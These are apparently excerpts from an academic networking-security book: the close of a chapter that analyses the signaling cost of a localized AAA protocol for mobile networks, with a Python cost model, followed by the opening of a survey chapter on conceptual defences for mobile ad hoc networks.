Figure 7. Man-in-the-middle attack by a malicious MR

between two parties without either party knowing that the link between them has been compromised. In NEMO environments, we can imagine an attack in which a malicious MR relays authentication messages and intends to use network resources illegally. Figure 7 illustr
ates the man-in-the-middle attack by a malicious MR for the inter-domain authentication. The malicious MR acts as an AR and relays authentication messages between the victim MR and the AR. After the authentication procedures, the malicious MR can still relay all of the traffic between the victim MR and the AR. However, the malicious MR cannot use any network resource because it has no knowledge of K_LOCAL and K_HOME. Namely, if a fresh session key is established, the malicious MR cannot further compromise the authentication procedure between the MR and the AAAL server.

SIGNALING COST ANALYSIS

Reducing the AAA traffic is an important requirement in NEMO environments where a MONET moves with a high velocity and AAA procedures are frequently performed (e.g., train or car). Therefore, through an analytical model, we quantify the AAA cost (C_AAA), which is defined as the volume of AAA-related messages delivered over the network; the unit of C_AAA is bytes × hops (Lo, Lee, Chen, & Liu, 2004).

Let i and j be the numbers of intra-domain handoffs and inter-domain handoffs for each session, respectively. It is assumed that the subnet residence time of the MONET follows a general distribution with mean 1/μ_S, whose probability density function (PDF) is f_S(t) and whose Laplace transform is f*_S(s). In addition, the domain residence time of the MONET follows a general distribution with mean 1/μ_D, whose PDF is f_D(t) and whose Laplace transform is f*_D(s). When the inter-session arrival time is assumed to follow an exponential distribution with rate λ_I, the PDFs of i and j are respectively given by (Lin, 1997)

$$\alpha(i)=\begin{cases}1-\dfrac{1}{\rho_S}\left[1-f_S^*(\lambda_I)\right], & i=0\\[4pt]\dfrac{1}{\rho_S}\left[1-f_S^*(\lambda_I)\right]^2\left[f_S^*(\lambda_I)\right]^{i-1}, & i>0\end{cases}$$

and

$$\beta(j)=\begin{cases}1-\dfrac{1}{\rho_D}\left[1-f_D^*(\lambda_I)\right], & j=0\\[4pt]\dfrac{1}{\rho_D}\left[1-f_D^*(\lambda_I)\right]^2\left[f_D^*(\lambda_I)\right]^{j-1}, & j>0\end{cases}$$

where $\rho_S=\lambda_I/\mu_S$ and $\rho_D=\lambda_I/\mu_D$. Since an inter-domain handoff implies that an intra-domain handoff also occurs, i − j represents the number of pure intra-domain handoffs. Therefore, the AAA cost of the MR authentication in the proposed AAA protocol when there are i intra-domain handoffs and j inter-domain handoffs can be computed as

$$C^{MR}_{AAA}(i,j)=(i-j)\cdot C^{MR}_{intra}+j\cdot C^{MR}_{inter}, \qquad (3)$$

where C_intra^MR and C_inter^MR are the costs of intra-domain AAA and inter-domain AAA operations. On the other hand, the AAA cost of the MR authentication without the localized AAA procedure is given by

$$C^{MR}_{AAA}(i,j)=i\cdot C^{MR}_{non\text{-}local}, \qquad (4)$$

where C_non-local^MR is the cost of an AAA operation without the localized AAA procedure. Then, the average AAA cost of the MR can be expressed as

$$\bar{C}^{MR}_{AAA}=\sum_i\sum_j C^{MR}_{AAA}(i,j)\cdot\alpha(i)\cdot\beta(j). \qquad (5)$$

For the VMN’s AAA cost, we consider the AAA cost incurred while the VMN is attached to the MONET. We assume that the VMN’s attachment time is drawn from an exponential distribution with mean 1/λ_A. Let k be the number of inter-domain handoffs during the attachment time. Then, the PDF of k is given by

Table 2. Parameters for numerical results

Wireless weight   Number of ARs in a domain   λ_I   λ_A   D1          D2     D3
10                49                          1     1     2, 5, 10    2, 5   2, 5

Table 3. Message length (bytes)

Attendant Solicit   Attendant Advertisement   AReq   ARep   AMR
52                  84                        116    120    172

AHR   AHA   AMA   AMLR   AMLA
144   136   166   180    152
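The cost model of equations (3)–(5) above and (6)–(7) below, evaluated with the parameters of Tables 2 and 3, as an added example that is not the chapter’s code. It assumes exponential residence times (so f*(s) = μ/(μ + s)), one hop each for the AR–AAAL and AAAH–HA paths that Table 2 does not give, and a 40-byte IPv6 header of tunnelling overhead for the VMN’s messages on the MR–HA path; the distribution of the handoff counts i, j and k is the one the section quotes from Lin (1997).

```python
"""Signaling-cost model of equations (3)-(7) with the parameters of Tables 2 and 3
(added example, not the chapter's code).  Assumptions: residence times are exponential,
so f*(s) = mu/(mu + s); the hop counts AR-AAAL and AAAH-HA, which Table 2 does not give,
are set to 1; the VMN's AMR/AMA cross the MR-HA tunnel, adding a 40-byte IPv6 header."""
WIRELESS_WEIGHT = 10      # weight of a wireless hop (Table 2)
N_SUBNETS = 49            # subnets (ARs) per domain (Table 2)
LAMBDA_I = 1.0            # session arrival rate, normalised (Table 2)
LAMBDA_A = 1.0            # inverse mean VMN attachment time, normalised (Table 2)
D_AR_AAAL = 1             # AR <-> AAAL hops (assumption)
D_AAAH_HA = 1             # AAAH <-> HA hops (assumption)
IPV6_HDR = 40             # IP-in-IP tunnelling overhead per packet on the MR-HA path
MSG = {"AttSol": 52, "AttAdv": 84, "AReq": 116, "ARep": 120, "AMR": 172,
       "AHR": 144, "AHA": 136, "AMA": 166, "AMLR": 180, "AMLA": 152}   # Table 3, bytes


def laplace_exp(mu, s):
    """Laplace transform of an exponential residence time with mean 1/mu."""
    return mu / (mu + s)


def handoff_pdf(rho, fstar, n):
    """alpha(i), beta(j) or gamma(k): P[n handoffs per session/attachment] (Lin, 1997)."""
    if n == 0:
        return 1.0 - (1.0 - fstar) / rho
    return (1.0 - fstar) ** 2 * fstar ** (n - 1) / rho


def mean_handoffs(rho, fstar, nmax=400):
    """E[n] under handoff_pdf by truncated summation (the closed form is 1/rho)."""
    return sum(n * handoff_pdf(rho, fstar, n) for n in range(nmax))


def cost_intra_mr():
    """C_intra^MR: Attendant Advertisement, AReq, ARep on the air; AMLR/AMLA to the AAAL."""
    air = MSG["AttAdv"] + MSG["AReq"] + MSG["ARep"]
    return WIRELESS_WEIGHT * air + (MSG["AMLR"] + MSG["AMLA"]) * D_AR_AAAL


def cost_inter_mr(d1):
    """C_inter^MR (= C_non-local^MR): steps 1-10 of Figure 4, with AMR/AMA travelling
    D1 hops between the AAAL and the AAAH, and AHR/AHA between the AAAH and the HA."""
    air = MSG["AttSol"] + MSG["AttAdv"] + MSG["AReq"] + MSG["ARep"]
    wired = (MSG["AMR"] + MSG["AMA"]) * (D_AR_AAAL + d1) + (MSG["AHR"] + MSG["AHA"]) * D_AAAH_HA
    return WIRELESS_WEIGHT * air + wired


def cost_vmn(d2, d3):
    """C_AAA^VMN: VMN-MR exchange and the MR's egress on the air, AMR/AMA tunnelled over
    D2 hops to the HA, then to AAAH_MR and on to AAAH_VMN over D3 hops (Figure 6)."""
    air = MSG["AttAdv"] + MSG["AReq"] + MSG["ARep"] + MSG["AMR"] + MSG["AMA"]
    amr_ama = MSG["AMR"] + MSG["AMA"]
    return (WIRELESS_WEIGHT * air + (amr_ama + 2 * IPV6_HDR) * d2
            + amr_ama * (D_AAAH_HA + d3))


def mean_cost_mr(mu_s, d1, localized=True):
    """Equation (5): average per-session AAA cost of the MR, with mu_D = mu_S / N
    (fluid-flow model); the double sum reduces by linearity to E[i] and E[j]."""
    mu_d = mu_s / N_SUBNETS
    e_i = mean_handoffs(LAMBDA_I / mu_s, laplace_exp(mu_s, LAMBDA_I))   # E[i] over alpha
    e_j = mean_handoffs(LAMBDA_I / mu_d, laplace_exp(mu_d, LAMBDA_I))   # E[j] over beta
    if not localized:
        return e_i * cost_inter_mr(d1)                                  # (4): i * C_non-local
    return (e_i - e_j) * cost_intra_mr() + e_j * cost_inter_mr(d1)      # (3) averaged


def mean_cost_vmn(mu_s, d2, d3):
    """Equation (7): average AAA cost of a VMN over its attachment time."""
    mu_d = mu_s / N_SUBNETS
    e_k = mean_handoffs(LAMBDA_A / mu_d, laplace_exp(mu_d, LAMBDA_A))   # E[k] over gamma
    return e_k * cost_vmn(d2, d3)                                       # (6) averaged


if __name__ == "__main__":
    for mu_s in (0.5, 1.0, 2.0):
        for d1 in (2, 5, 10):
            print(mu_s, d1, round(mean_cost_mr(mu_s, d1), 1),
                  round(mean_cost_mr(mu_s, d1, localized=False), 1))
    print(mean_cost_vmn(1.0, 5, 2) > mean_cost_vmn(1.0, 2, 5))   # True: tunnelling over D2
```

With μ_S = 1 and D1 = 2 the localized protocol costs 3532 + 1482/49 bytes × hops per session against 5014 for the non-localized one, and raising D2 from 2 to 5 while lowering D3 from 5 to 2 increases the VMN cost, which is the tunnelling effect the results section describes.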

$$\gamma(k)=\begin{cases}1-\dfrac{1}{\rho_A}\left[1-f_D^*(\lambda_A)\right], & k=0\\[4pt]\dfrac{1}{\rho_A}\left[1-f_D^*(\lambda_A)\right]^2\left[f_D^*(\lambda_A)\right]^{k-1}, & k>0\end{cases}$$

where $\rho_A=\lambda_A/\mu_D$. Hence, the AAA cost of the VMN when there are k inter-domain handoffs during the attachment time can be computed as

$$C^{VMN}_{AAA}(k)=k\cdot C^{VMN}_{AAA}, \qquad (6)$$

where C_AAA^VMN is the cost of each VMN AAA operation. Consequently, the average AAA cost of the VMN is expressed as

$$\bar{C}^{VMN}_{AAA}=\sum_k C^{VMN}_{AAA}(k)\cdot\gamma(k). \qquad (7)$$

In this section, we evaluate the effects of mobility and of the distance between a foreign network and a home network on the AAA cost (i.e., C_AAA^MR and C_AAA^VMN). The parameters and the size of each AAA message are shown in Tables 2 and 3, respectively, which are based on Calhoun et al. (2003) and Narten, Nordmark, and Simpson (1998). D1, D2, and D3 represent the distances between the AAAL server and the AAAH_MR server, between the MR and its HA, and between the AAAH_MR server and the AAAH_VMN server, respectively. Then, C_intra^MR, C_inter^MR, and C_non-local^MR can be calculated by multiplying the corresponding message length by the distance. For transmission over a wireless link, a weight value is used and it is set to 10 (Xie & Akyildiz, 2002). The number of subnets in a domain is 49. λ_I and λ_A are normalized to 1.0, whereas μ_D equals μ_S/N by the fluid flow model (Zhang, Castellanos, & Campbell, 2002), where N is the number of subnets in a domain.

As shown in Figure 8, the proposed AAA protocol has a smaller AAA cost than the non-localized AAA protocol. Also, it can be seen that C_AAA^MR increases as μ_S increases (i.e., as the subnet residence time of the MONET decreases). This is because the number of inter- or intra-domain handoffs is reduced when the mobility (i.e., μ_S) is low. Figure 8 also indicates the AAA cost variation for different

Figure 8. The AAA cost of an MR

Figure 9. The AAA cost of a VMN

D1 (i.e., D1 = 2, 5, 10). Since C_intra^MR and C_inter^MR are proportional to D1, C_AAA^MR increases significantly with the increase of D1. Especially, the effect of D1 is clearer in the non-localized AAA protocol because an AAA procedure is always performed at the AAAH server in the non-localized AAA protocol. Therefore, it can be concluded that our protocol is more effective regardless of the distance between the home network and the foreign network. Note that this AAA cost considers only one MR. Hence, as network mobility services proliferate, the reduction of the AAA cost by the proposed AAA protocol will be more significant.

Figure 9 shows the AAA cost of the VMN, which exhibits a similar trend to Figure 8. It can be seen that the AAA cost when (D2, D3) is (5,2) is higher than the AAA cost of (2,5). This is due to the IP-in-IP packet tunneling overhead between the MR and its HA. Namely, as the distance D2 between the MR and its HA increases, more tunneling overhead is incurred and then the AAA cost also increases. Similarly to Figure 9, the AAA cost of the VMN in our protocol is not highly affected by the distance values. Therefore, it is concluded that our protocol is less sensitive to the distance between the home network and the foreign network.

CONCLUSION

In this chapter, we have proposed a localized AAA protocol in NEMO environments. The proposed AAA protocol is consistent with the NEMO basic support protocol, where mobility transparency is supported. The proposed AAA protocol introduces a shared key between the MR and the AAA server in the foreign network, so that the AAA procedure for the MR in intra-domain handoffs can be localized. In addition, we proposed a flexible billing mechanism for VMNs moving across different domains. We analyzed the security concerns in the proposed AAA protocol in terms of mutual authentication, key exposure, replay attack, and

man-in-the-middle attack. Performance evaluation results reveal that the localized AAA procedure can reduce the AAA traffic significantly and that the localized AAA procedure is less sensitive to the distance between the home network and the foreign network. Consequently, it is expected that the proposed AAA protocol can be widely employed in NEMO environments.

REFERENCES

Aboba, B., & Beadles, M. (1999). The network access identifier (RFC 2486). Retrieved from http://tools.ietf.org/html/rfc2486

Calhoun, P., Loughney, J., Guttman, E., Zorn, G., & Arkko, J. (2003). Diameter base protocol (RFC 3588). Retrieved from http://www.rfc-editor.org/rfc/rfc3588.txt

Conta, A., & Deering, S. (1998). Internet control message protocol (ICMPv6) for the Internet protocol version 6 (IPv6) (RFC 2463). Retrieved from http://www.faqs.org/rfcs/rfc2463.html

Devarapalli, V., Wakikawa, R., Petrescu, A., & Thubert, P. (2005). Network mobility (NEMO) basic support protocol (RFC 3963). Retrieved from http://www.ietf.org/rfc/rfc3963.txt

Ernst, T., & Lach, H. (2005). Network mobility support terminology (RFC 4885). Retrieved from http://www.ietf.org/rfc/rfc4885.txt

Information Society Technologies (IST). (2003). Dynamic radio for IP-services in vehicular environments. Retrieved from http://www.ist-overdrive.org

Internet Engineering Task Force (IETF). (2006). Network mobility working group. Retrieved from http://www.ietf.org/html.charters/nemo-charter.html

Johnson, D., Perkins, C., & Arkko, J. (2003). Mobility support in IPv6 (RFC 3775). Retrieved from http://www.ietf.org/rfc/rfc3775.txt

Keio University. (2002). InternetCar project. Retrieved from http://www.sfc.wide.ad.jp/InternetCAR/

Le, F., Patil, B., Perkins, C., & Faccin, S. (2004). Diameter mobile IPv6 application. Internet Draft. Retrieved from http://tools.ietf.org/html/draft-ietf-aaa-diameter-mobileip-14

Lin, Y. (1997). Reducing location update cost in a PCS network. IEEE/ACM Transactions on Networking, 5(2), 25-33.

Lo, S., Lee, G., Chen, W., & Liu, J. (2004). Architecture for mobility and QoS support in all-IP wireless networks. IEEE Journal on Selected Areas in Communications, 22(4), 691-705.

Narten, T., Nordmark, E., & Simpson, W. (1998). Neighbor discovery for IP version 6 (IPv6) (RFC 2461). Retrieved from http://www.ietf.org/rfc/rfc2461.txt

Ott, J., & Kutscher, D. (2004, March). Drive-thru Internet: IEEE 802.11b for automobile users. Paper presented at the IEEE International Conference of the IEEE Communication Society, Hong Kong, China.

Xie, J., & Akyildiz, I. (2002). A distributed dynamic regional location management scheme for mobile IP. IEEE Transactions on Mobile Computing, 1(3), 163-175.

Zhang, X., Castellanos, J., & Campbell, A. (2002). P-MIP: Paging extensions for mobile IP. ACM Mobile Networks and Applications, 7(2), 127-141.

KEY TERMS

Accounting: Accounting is the action of tracking the consumption of network resources by users.

Authentication: Authentication is the action of confirming that a user who is requesting services is a valid user of the network services requested.

Authorization: Authorization is the action of granting the specific types of service to a user depending on the authentication.

Internet Engineering Task Force (IETF): IETF is an organization that develops, promotes, and standardizes Internet-related protocols.

Man-in-the-middle Attack: A man-in-the-middle attack is an attack in which an attacker is able to read, insert, and modify messages between two communicating parties.

Network Mobility: Network mobility is the mobility of an entire network that changes its point of attachment to the Internet as a single unit.

Replay Attack: A replay attack is an attack in which a valid data transmission is maliciously or fraudulently repeated or delayed.

ENDNOTE

1. In the NEMO basic support protocol, all packets destined to MNNs are tunneled at the MR’s HA, so that the MR’s HA can keep track of the network usage of individual LFNs and VMNs. Therefore, the MR’s HA can report this information to the AAAH server.


Section III
Security in Ad Hoc and Sensor Networks


Chapter XXVI
Security in Mobile Ad Hoc Networks
Bin Lu
West Chester University, USA

ABSTRACT

A mobile ad hoc network (MANET) is a self-configuring and self-maintaining network characterized by dynamic topology, absence of infrastructure, and limited resources. These characteristics introduce security vulnerabilities, as well as difficulty in providing security services to MANETs. Tremendous research effort has gone into developing security approaches for MANETs. This chapter discusses the existing approaches that are intended to defend against various attacks at different layers. Open challenges are also discussed.

INTRODUCTION

A mobile ad hoc network (MANET) is a self-configuring and self-maintaining network composed of mobile nodes that communicate over wireless channels (Perkins, 2001). MANETs are characterized as infrastructure-less, with rapid topology change, high node mobility, and stringent resource constraints. A MANET is typically used in situations such as military operations, disaster recovery, and emergency medical response. While applications in these areas still dominate the research needs for MANETs, commercial applications (such as home networking and personal area networks) have also been brought to attention with the rapid progress in mobile telephony and personal digital assistants.

Early research in MANETs assumed a cooperative and trusted environment, which unfortunately is not always the case. In an unfriendly environment, a variety of attacks can be launched, ranging from passive eavesdropping to active interference. The attacks can target a number of devices or services in MANETs, such as wireless channels, routing protocols, high-level applications, or even the security mechanisms themselves. A misbehaving node can be selfish or malicious, depending on its intentions. A selfish node may simply deviate

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

from network protocols in order to maximize its own profit, while a malicious node may intend to corrupt some services or bring down other nodes. Both selfish and malicious misbehaviors are dangerous in that they can cause degradation of network performance, or even paralysis of the entire network. Therefore security has become a primary concern, especially for security-sensitive applications in a noncooperative or hostile environment.

However, introducing security features to MANETs is not a trivial task. The lack of a fixed infrastructure means that MANETs do not have a clear physical line of defense, unlike their wired counterparts, which can deploy security defense mechanisms (e.g., firewalls) at network devices such as gateways or routers. The decentralized manner of operation also implies that a central administration point is not realistic for MANETs. Moreover, all security services come with a price. The security mechanisms share the precious communication and computation resources with other services, which may consequently affect the performance of the node, or even of the entire network. Performance is also a basic concern for ad hoc networks, which means a tradeoff has to be made between security and other services such as computation and communication. Therefore, minimum consumption of resources is one of the most important requirements for security solutions in MANETs.

This chapter discusses security issues in MANETs, including security attacks, security requirements, security solutions, and their advantages and weaknesses.

The remainder of this chapter is organized as follows: the following section discusses the security vulnerabilities, security services, and security challenges for MANETs; the third section focuses on the security solutions that have been proposed for MANETs. The security mechanisms that protect MAC (medium access control) layer communications and routing protocols are described there. Intrusion detection, authentication, and key management are also discussed in that section. The last section discusses the open research issues for MANET security and concludes the chapter.

VULNERABILITIES, SECURITY SERVICES, AND CHALLENGES

MANET Vulnerabilities

MANETs suffer from all the vulnerabilities that their wired counterparts encounter. An adversary may launch various attacks ranging from passive eavesdropping to active interference such as traffic jamming, packet modification and fabrication, message replay, denial-of-service (DoS), and so forth. Some of these vulnerabilities are aggravated in a wireless context due to the characteristics of MANETs, such as the lack of a clear line of defense and the over-the-air communications.

Besides, ad hoc networks are susceptible to vulnerabilities that are inherent to wireless networks, which reside in their routing and autoconfiguration mechanisms. The MAC protocols (such as the IEEE [1999] 802.11 series) and most of the routing protocols for MANETs are designed with the assumption that all nodes will cooperate and will not intentionally deviate from the protocols. However, this is not always true, especially in an autonomous network where nodes belong to different self-interested organizations.

Eavesdropping is generally easier in MANETs than in the Internet due to the open nature of the communication medium. Passive attacks are by nature difficult to detect, the more so in MANETs, where many mobile devices support promiscuous mode. As in wired networks, cryptographic operations are used to protect ad hoc networks from eavesdropping.

The MAC protocols in MANETs are vulnerable to traffic jamming, which is caused by nodes that fail to follow the protocols in order to maximize their own profit or simply to disrupt network operations. A node can obtain an unfair share of the bandwidth by transmitting without waiting for its turn, or interrupt signal transmissions by injecting bogus signals into the network. Communication channels in MANETs are open and shared, so it is difficult to prevent and detect this kind of attack. Moreover, ad hoc nodes are usually battery-powered, which makes energy a precious resource in MANETs. An adversary could launch a new type



of DoS attack, namely the "sleep deprivation torture" attack (Stajano & Anderson, 1999), by forcing a node to relay packets.

Ad hoc routing requires the participation of all the nodes in the network. MANETs are peer-to-peer: all nodes play the same roles, as end hosts and as routers. However, some selfish nodes may refuse to forward data packets or routing requests for other nodes in order to save energy or communication resources. More dramatic attacks by malicious nodes include dissemination of false routing information, sending frequent routing updates to achieve denial of service, and diverting traffic from the legitimate route.

As in traditional wired networks, attacks can target the security mechanisms as well. For example, cryptographic operations are at risk if a secret key is intercepted and compromised, or if a trusted authority is brought down. These attacks are not intrinsic to wireless networks, but they are difficult to prevent and detect in the context of MANETs.

Security Services

The services that should be provided in MANETs are the same as those in wired networks: availability, authentication, integrity, confidentiality, and nonrepudiation.

• Availability ensures that network services are provided as intended. In an ad hoc network without the protection of proper security mechanisms, service performance and availability can be easily compromised. For example, signal jamming at the physical and medium access control layers can seriously interfere with communications or even bring down the physical channels. A malicious or selfish node can also disrupt routing services, which may result in network partition. To address the problem, some economic models have been proposed to stimulate cooperation among nodes. Monitoring techniques are also used to ensure the proper provision of network services. For instance, a node in promiscuous mode can monitor the communications in its vicinity.

• Authentication ensures that the identity of a node in a communication is indeed the entity it declares itself to be. Authentication can prevent identity masquerade and unauthorized access to resources or information. It is usually provided by a digital signature or by possession of a secret (such as a key). Due to the stringent resource constraints of MANETs, the authentication protocols of the traditional Internet are often not applicable because they consume too many computational resources. Authentication approaches based on one-way hash functions, which are much faster than other cryptographic operations, have drawn much attention because of their efficiency.

• Integrity ensures that a message in transmission has not been maliciously altered or corrupted. A message can be corrupted by malicious attacks or by communication failures, which may be common on the lossy channels of ad hoc networks. In addition to the traditional approaches used in the Internet, some researchers have proposed that a node perform an integrity check by overhearing the next hop when it forwards the packet along the path. This overhearing technique is easy to apply in ad hoc networks because of the open nature of the communication channels.

• Confidentiality guarantees that sensitive information is not disclosed to unauthorized entities. The encryption used in wired networks is also used in MANETs.

• Nonrepudiation ensures that the originator of a message cannot deny having sent it. Nonrepudiation allows a malicious node that has sent false information to be accused by legitimate users, and is therefore important for intrusion detection. Asymmetric-key cryptography has been used to provide nonrepudiation in both the Internet and MANETs.

Other security services for MANETs include authorization and accounting. To the best of our knowledge, however, not much research work has been published on authorization or accounting specifically for MANETs.

Security Challenges

Security is an important issue for mobile ad hoc networks, especially for those in security-sensitive environments. However, the unique characteristics of MANETs, such as the absence of infrastructure, rapid and unpredictable changes of topology, the open and shared wireless medium, and stringent resource constraints, pose nontrivial challenges to security design.

First, the use of an open shared medium makes an ad hoc network susceptible to attacks such as eavesdropping, signal jamming, impersonation, message distortion, and message injection. A malicious node is able to impersonate other nodes even without gaining physical access to the victims.

Second, the absence of infrastructure and the frequent change of topology and membership greatly raise the probability of a network being compromised. Unlike traditional wired networks, MANETs have no dedicated routers that form a clear line of defense where traffic monitoring or access control mechanisms can be deployed. In addition, each mobile node functioning as a router and participating in routing and packet forwarding may lead to significant vulnerability, since a malicious node en route can tamper with the routing and data packets. In an ad hoc network it is also difficult to introduce a central administrative entity into security solutions, in that such an entity can easily become a target of attacks, which may then cause failure of the entire network.

Third, due to resource constraints (such as power, bandwidth, CPU capacity, and memory), security mechanisms for MANETs must be lightweight in terms of communication overhead, computation complexity, and storage overhead. Asymmetric cryptography is usually considered too expensive for MANETs. Therefore symmetric cryptographic algorithms and one-way functions are commonly used to protect data integrity and confidentiality.

Last, an ad hoc network may consist of a great number of nodes, which makes scalability another main concern for security solutions.

The security mechanisms or approaches should be adapted to the characteristics of MANETs. Yang, Luo, Ye, Lu, and Zhang (2004) propose that security solutions for MANETs should accommodate the following needs. First, the prevention and detection mechanisms should be fully distributed throughout the network. They should collect security information from individual nodes to secure the entire network, and the security components on each node should be able to work alone for local prevention and detection with limited computational resources and battery power. Second, the security mechanisms on the different layers of the protocol stack should all cooperate and contribute to a line of defense; also, all three components of intrusion prevention, detection, and response should be used to provide security. Finally, the security solutions should be able to adapt to the highly dynamic topology. It is difficult to accommodate all of these needs.

SECURITY SOLUTIONS FOR MANETS

Several security techniques or mechanisms have been commonly used to provide security features to the MAC layer and to ad hoc routing.

Digital signatures can protect the integrity of data packets and of the nonmutable fields in routing packets. However, public-key cryptography is much slower than symmetric-key cryptography, especially on devices with limited resources (such as CPU power and memory space), and has been considered unacceptable for MANETs by many researchers. Moreover, it is vulnerable to DoS attacks that flood the network with bogus packets for which signature verification is required. But public-key cryptography is still adopted in many security mechanisms because of its superiority in key distribution and its effectiveness in providing integrity and nonrepudiation services.

A hash function is much faster than public-key cryptography and therefore well suits the low-overhead requirement of MANETs. A hash chain is usually used to authenticate the mutable fields in neighboring communications. A hash chain



is built by applying a one-way hash function repeatedly. To create a one-way hash chain, a node chooses a random value and then generates a list of hash values, h0, h1, h2, ..., hn, from the random value, where h_{i+1} = H(h_i) for 0 ≤ i < n and H is the hash function. To use a one-way hash chain for authentication, hn is distributed first, in a way that makes it trusted (for example, under a signature). A subsequently released element hi is then authenticated by applying H to it (j − i) times and comparing the result with a previously distributed and already trusted element hj (j > i). Because H is one-way, an adversary who knows hj cannot produce an hi that hashes to it.

Monitoring techniques have proved an effective way to provide availability for routing advertisements and data packet forwarding, and to promote fair sharing of bandwidth at the MAC layer. To monitor, nodes turn on promiscuous mode to listen to the communications of neighboring nodes in order to ensure the proper transmission of frames or packets.

Reputation mechanisms have been used together with cooperation mechanisms to enhance security in routing and MAC layer protocols. They are discussed under "Cooperation in MANETs" in a later section.

Wireless MAC Security

MAC protocols for wireless networks such as IEEE 802.11 (1999) use a contention resolution mechanism for sharing the open communication channel. This mechanism is fully distributed and requires cooperation among all the participating nodes, which are expected to perform a random backoff before transmission to reduce contention and to ensure a reasonably fair share of the channel.

However, in an untrusted network environment where selfish or malicious nodes may be present, cooperation cannot always be guaranteed. A selfish node may intentionally deviate from the MAC protocol to maximize its throughput by obtaining an unfair share of the bandwidth. A malicious node may mount denial-of-service (DoS) attacks by injecting frames on the wireless medium continuously, or intermittently in order to conserve its own energy. The injection may cause radio collisions and transmission jamming, and thus repeated backoffs among legitimate nodes. A malicious node can also transmit strong noise signals to prevent messages in the victim's vicinity from being received.

Whether a node is selfish or malicious, the consequences of its misbehavior can be severe, and therefore such misbehavior should be addressed as a security problem of central concern. The security solution is to detect misbehaviors and to locate the misbehaving nodes in a timely and reliable manner. This is not a trivial task due to the random nature of the MAC protocols and the shared and volatile medium. It is especially difficult to differentiate between misbehavior and an occasional deviation caused by impairment of the wireless link.

Several approaches have been proposed to handle selfish and malicious misbehaviors at the MAC layer.¹

One approach is to address selfish misbehaviors by using game-theoretic techniques to find a state where the misbehaving nodes cannot gain any advantage over the well-behaved nodes (Cagalj, Ganeriwal, Aad, & Hubaux, 2004; Konorski, 2001, 2002; Mackenzie & Wicker, 2000, 2003; Michiardi & Molva, 2002b). This approach has also been used at the network layer to secure routing.

Konorski (2001, 2002) proposes a game-theoretic model that targets selfish nodes which fail to adhere to the MAC protocol by waiting for smaller backoff intervals than they are supposed to. By applying the noncooperative game model (Jones, 2000), the approach modifies the backoff algorithm using blackbursts and leads the game to a Nash equilibrium point (Nash, 1950). The approach requires accurate measurement of durations, which is difficult to guarantee in MANETs. Cagalj et al. (2004) developed a strategy that employs two Markov chains (Jha, Tan, & Maxion, 2001) to derive from the contention windows the access probabilities of the misbehaving nodes and of the well-behaved nodes, respectively. The approach can reach the Nash equilibrium with multiple selfish nodes.

Another approach, which has been used most widely, is to monitor the neighboring nodes by overhearing and then to penalize the identified misbehaving nodes (Gupta, Krishnamurthy, & Faloutsos, 2002; Kyasanur & Vaidya, 2005; Radosavac, Baras, &



Koutsopoulos, 2005; Radosavac, Cardenas, Baras, & Moustakides, 2006; Raya, Hubaux, & Aad, 2004; Xu, Trappe, Zhang, & Wood, 2005).

Raya et al. (2004) deal with MAC misbehaviors in wireless hot-spot communities, such as intentionally scrambling frames or illegally manipulating backoff intervals. A sequence of observations is required to detect misbehaviors based on the extent to which the MAC protocol parameters are manipulated.

Kyasanur and Vaidya (2005) propose modifications to IEEE 802.11, such as letting the receiver of a particular transmission decide whether the sender has deviated from the protocol. It is proposed to use additional nodes in the vicinity to detect collusion between the receiver and the sender. The authors also present a diagnosis scheme, which uses a moving window and a threshold to capture the misbehaving nodes. A scheme for punishing a selfish node is also presented. Simulation results show that the detection and penalty schemes are effective in handling selfish MAC misbehaviors.

Radosavac et al. (2005) propose to let a node compute the backoff values of its neighboring nodes based on the RTS (request-to-send), CTS (clear-to-send), or ACK (acknowledgement) messages. The problem is cast into a "minimax robust detection framework," in which the worst-case instance of the attack is identified and a detection rule of optimum performance is generated under uncertain information. The approach requires clock synchronization, which is considered unrealistic by some researchers. A more recent work by Radosavac et al. (2006) is an advanced version of their 2005 work and studies single-node attacks as well as colluding attacks.

Gupta et al. (2002) and Xu et al. (2005) studied DoS attacks at the MAC layer and analyzed different attack models with their traffic patterns. Gupta et al. (2002) demonstrate, by simulation of the IEEE 802.11 protocol and emulation of a perfectly fair MAC (FAIRMAC) protocol, how MAC layer fairness can prevent or alleviate the effect of DoS attacks. The authors also show that many other factors, such as the location of the malicious node, the availability of other compromised nodes, and the availability of routing information, together with the fairness, determine the efficacy of the DoS attacks. Xu et al. (2005) also provide interesting insights into jamming attacks at the MAC layer. They propose four jamming attack models that can be used by an adversary intending DoS attacks: constant, deceptive, random, and reactive jamming. The effectiveness of the four jammer strategies is evaluated by implementing a prototype on the Berkeley Motes platform. Different measurements for detecting jamming attacks are proposed; the authors found that no single measurement is sufficient to conclusively differentiate malicious attacks from link impairment.

To reliably detect misbehaviors at the MAC layer, accurately and reliably monitoring the transmission pattern of a node is a critical factor and still deserves further investigation.

Secure Routing Protocols

Routing protocols for MANETs are very different from the existing Internet protocols, because MANETs are self-organized and the protocols need to cope with frequent topology change, an open shared medium, and resource restrictions. In addition, all nodes also serve as routers, participating in route discovery, route maintenance, and packet delivery. These characteristics introduce significant difficulty for routing security in MANETs.

In 1996, the Internet Engineering Task Force (IETF) established a MANET working group (Macker & Chakeres, 2006), whose goal is "to standardize IP routing protocol functionality suitable for wireless routing applications." Since then, several routing protocols have been proposed particularly for MANETs.

AODV (ad hoc on-demand distance vector) (Perkins, Belding-Royer, & Das, 2003) is a reactive routing protocol. In AODV, a node that needs to establish a route to another node broadcasts a route request (RREQ) message to its neighbors. Each node that receives the message establishes a reverse link toward the originator of the RREQ, unless such a link already exists. Dynamic source routing (DSR) (Johnson, Maltz, & Hu, 2004) is a protocol that uses the source routing technique, in which the sender constructs a "source route" in the packet's header that lists the hosts on the path. Destination-sequenced distance-vector (DSDV) (Perkins & Bhagwat, 1994) is a proactive routing protocol which maintains a routing table that lists all possible destinations in the network together with the metric and next hop to each destination.

These protocols were designed without security in mind, and are therefore susceptible to various attacks.

Attacks on MANET Routing

A selfish or malicious node can disrupt routing services passively or actively. Its purposes include selfish conservation of its own resources, disruption of routing, excessive resource consumption, and so forth.

A selfish node may refuse to participate in routing by simply discarding routing packets. This attack is usually not defended against by secure routing protocols, in that the node can still fail to forward data packets even if a path including the selfish node has been established. To counter this attack, some cooperation mechanisms have been proposed, which are discussed later.

